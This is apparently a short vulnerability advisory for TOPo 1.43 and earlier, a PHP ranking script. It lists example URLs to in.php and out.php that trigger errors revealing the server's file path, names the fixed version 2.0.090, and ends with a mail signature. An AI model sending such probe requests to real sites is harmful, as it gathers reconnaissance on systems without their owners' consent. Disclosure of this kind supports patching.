+ Poduct: TOPo. TOPo is a free TOP system written in PHP that works without MySQL database. TOPo is specially designed for web sites hosted in web servers that not offer a quality MySQL support. More info: http://ej3scripts.loadedweb.com/modules.php?name=Info_Scripts&file=index&func=topo + Web Site: http://www.eejj33.tk/ + Version: 1.43 and prior + Bug: TOPo 1.43 and prior - Path Disclosure (in.php, out.php) + Exploit: http://hots/[top_path]/in.php? http://hots/[top_path]/out.php? http://hots/[top_path]/in.php?id=any_word http://hots/[top_path]/out.php?id=any_word http://hots/[top_path]/in.php?any_word http://hots/[top_path]/out.php?any_word The failure takes place when trying to open the file that takes the name of parameter that we happened to him. When not being the archives it along with shows to the error in screen the route to us in the server. + Solution: Install the version 2.0.090 that this free one of this error as his creator said. Download Last Version: http://ej3scripts.loadedweb.com/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=12&title=EJ3_TOPo_v2.0.090 -- XyBØrG WebMaster de: www.RZWEB.com.ar Powered By Dattatec.Com +++ GMX - Mail, Messaging & more http://www.gmx.net +++ NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!